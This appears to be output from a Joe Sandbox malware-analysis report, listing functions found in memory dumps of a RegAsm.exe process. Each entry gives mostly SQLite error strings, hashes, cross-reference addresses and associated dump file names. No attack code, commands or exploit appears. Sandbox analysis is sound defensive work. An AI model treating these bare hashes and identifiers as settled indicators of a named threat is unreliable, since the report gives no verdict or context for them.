Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1037342196
Opcode ID: 54730c13f6c79630b298c5ce71b86be5f38a4db22577921d9eb5af464397725e
Instruction ID: 7630ea86e9b05a38a38988a78c4722008b54c2642193511aeaa99446068a534b
Opcode Fuzzy Hash: 54730c13f6c79630b298c5ce71b86be5f38a4db22577921d9eb5af464397725e
Instruction Fuzzy Hash: DB213BB55087869BD710DB14CC84BFBBBDAABC4304F9C4C6DD59887192C6359D448393

Function 19275390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192753FE
%s at line %d of [%.10s], xrefs: 1927540D
database corruption, xrefs: 19275408

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: ed45422a6588c27acb46506775f8f7fe142fae925c00da1abb8c2816621ffafe
Instruction ID: e4e8ab403b2fde77e1c2696e1cd45be2cf2d26a03f539c932da473ed937fa723
Opcode Fuzzy Hash: ed45422a6588c27acb46506775f8f7fe142fae925c00da1abb8c2816621ffafe
Instruction Fuzzy Hash: A331A8292047D246D7258F389850BA3F7E09F22312F5C446EE8C9E76C1E332F486C3A2

Function 19357ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

no such tokenizer: %s, xrefs: 19357F1B
error in tokenizer constructor, xrefs: 19357F92

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 9b76f55781c02b83a00270b7bb91481726f69723f78a963502e8f845f6b92a55
Instruction ID: b49a75f643ca6b58e7198593daf568ba75b02614a0d49452ff87a0102e8142de
Opcode Fuzzy Hash: 9b76f55781c02b83a00270b7bb91481726f69723f78a963502e8f845f6b92a55
Instruction Fuzzy Hash: 9831B0767002158FD721CF19D880B6AB3E4EF89765F19466DE98ADB340E332ED05CB61

Function 1923F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 1923F0C4

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: eb7b7be0d95aae769a3cf260501726d806dd3c709832d6706f859da40709a866
Instruction ID: a9bb0078bd3421bde625c4b2b722720fdbb398ad59fec920bac211d955403c66
Opcode Fuzzy Hash: eb7b7be0d95aae769a3cf260501726d806dd3c709832d6706f859da40709a866
Instruction Fuzzy Hash: 423139F6800303ABEB10DE18FD41E5673A0BF08712F9C8554F8D5A6284E732EF548692

Function 19275280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192752F2
%s at line %d of [%.10s], xrefs: 19275301
database corruption, xrefs: 192752FC

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 4a3c1b74e932ebb04699541f7c7f2382e82f5c820259fc5cab6f7cd81b2deef5
Instruction ID: ce69fc44c38fa45bea0896e7eef7d6ae69af6dc67b3f22a77ddd74ac8edb4f42
Opcode Fuzzy Hash: 4a3c1b74e932ebb04699541f7c7f2382e82f5c820259fc5cab6f7cd81b2deef5
Instruction Fuzzy Hash: 2611577B60020067CB105A49FC00CDBBFA5DFC52B6F5D8565FA48A7222D323D92193A1

Function 1927FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1927FDE6, 1927FE61
%s at line %d of [%.10s], xrefs: 1927FE82
database corruption, xrefs: 1927FE7D

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: a8f74c6a0f2ad1072f4fffac0a1ff7952ff1be9948016066e996aa3fef5022ef
Instruction ID: fa272ff5eca4ebe6fc39554e59d99824653a913a417844d0471d2253df2e1a37
Opcode Fuzzy Hash: a8f74c6a0f2ad1072f4fffac0a1ff7952ff1be9948016066e996aa3fef5022ef
Instruction Fuzzy Hash: 64311C681143818AD3299F25C4007A2BBA1BF25308FA8D4CDD44AAF793E37BC4C3D796

Function 1928D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1928D725

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 6039e8ff93a18fc84009a2b0fbddf3100cb278581544c217e5a2e8ac01be5b4c
Instruction ID: a7224e66668809a1b892b1df3de2f7b08acb0ed697982fc6f3f14cb56ac872c3
Opcode Fuzzy Hash: 6039e8ff93a18fc84009a2b0fbddf3100cb278581544c217e5a2e8ac01be5b4c
Instruction Fuzzy Hash: 6A11AF759002A59BEB019B25DDC8A5B33E8FF8025AF184229EE0C96281D735E618C7A2

Function 192E1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 192E1F92

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: fc2e736d045cbc50707c84d326df00f7d64958029b3c555809c901b12a19331a
Instruction ID: cd8970f83d5e2de1ec7ee1b97d9dcbbbb369805df6bbaed5b9883b9105a3abd6
Opcode Fuzzy Hash: fc2e736d045cbc50707c84d326df00f7d64958029b3c555809c901b12a19331a
Instruction Fuzzy Hash: 5C0104B2A092116FEB209B548C00BDB7BC4EF45321F38466CF495962D1DB71E90183E2

Function 19241DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19241E53
misuse, xrefs: 19241E59
%s at line %d of [%.10s], xrefs: 19241E63

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 2a7cdeb05aad6084337a210d9086bfec3fc39e5ec41e9e585b662e7daf40b6d8
Instruction ID: 5c7f535a076786d5d85e4f88ebc03bb1483de0ef92ec7b22126b13b1628f6a79
Opcode Fuzzy Hash: 2a7cdeb05aad6084337a210d9086bfec3fc39e5ec41e9e585b662e7daf40b6d8
Instruction Fuzzy Hash: E711E7387089919FD318CE28E844A57BB78BF56745F380068E555CB323C330D905C7A2

Function 1925F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1925F105

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 5aa050366420cab85e32711655dd6cd6c0b473e5732922df77241d7dfe756bb2
Instruction ID: 7b48018d90cee5bc0e2f0ee0a6122b9989ea6f03a57b68d0b5d1ec9121c207dd
Opcode Fuzzy Hash: 5aa050366420cab85e32711655dd6cd6c0b473e5732922df77241d7dfe756bb2
Instruction Fuzzy Hash: CC01B17A3042425FE321C66EFC40FD7B7E8EBC8221F19446EF5AEC3201D361A88583A1

Function 19260D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19260D87

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: c14235af42738b3840469d8855602609646692dab6f3eca0df7943825023da18
Instruction ID: f87e2f5f5231512aa444b7dec63f0d380756ed764231f8c646c34e7c772dcd4f
Opcode Fuzzy Hash: c14235af42738b3840469d8855602609646692dab6f3eca0df7943825023da18
Instruction Fuzzy Hash: 4B01DC76200201AFE320DA4EED80F42B3E9EB88324F684458FA8DD7680D776FC818750

Function 1923EF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1923EFA6
misuse, xrefs: 1923EFB0
%s at line %d of [%.10s], xrefs: 1923EFB5

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 6e1da1919049e3573f2d7f9b48026673f988ff4af3504a3414a27579693cb4ba
Instruction ID: 745112faa041469ae9ab87fceab301164ebcb9e2f45e5dc5d1bb6904e1b39616
Opcode Fuzzy Hash: 6e1da1919049e3573f2d7f9b48026673f988ff4af3504a3414a27579693cb4ba
Instruction Fuzzy Hash: EB01F5B09056A59FE700CF18DC84B4A3BA1EF85305F494158E9496B391C371F945CBD3

Function 192A9180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 192A9192

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: 4bb454332681b9cf102a1a1c33a7cba34f9c74bce054a802ae442dbd2332f4b9
Instruction ID: 4b9188b08192ce6831b5ee0fcd62c4bae5083209152594a3765996ddf5c00298
Opcode Fuzzy Hash: 4bb454332681b9cf102a1a1c33a7cba34f9c74bce054a802ae442dbd2332f4b9
Instruction Fuzzy Hash: 3DF02777B042523BE70086BAFD40B46EBD9AB54261F9C8625E40C92154C316BD9183D1

Function 19257F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19257F76

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 8d8197076c4e7c0b82363123a0f9425efae255b72a37c23402b60e71bbfe5a02
Instruction ID: a71e267b9ac654072750791b59ab9ee3a8c2321925488b7bf6b8dd8224bf52b3
Opcode Fuzzy Hash: 8d8197076c4e7c0b82363123a0f9425efae255b72a37c23402b60e71bbfe5a02
Instruction Fuzzy Hash: 3CF02B7764430347E7009F19FC01BC977D4AFC5312F9D4126F84496290E760E98587A1

Function 00410CAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
wsprintfW.USER32 ref: 00410CCF

Strings

%hs, xrefs: 00410CC9

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 8f38b0a2f3c04c001adce26eef7d4480d116f62b86a175277d757bf0c2474944
Instruction ID: fc663afb3c4838e7790ae00fa1df3b469de1ff5c2c09bb33da5e0fc74afb7745
Opcode Fuzzy Hash: 8f38b0a2f3c04c001adce26eef7d4480d116f62b86a175277d757bf0c2474944
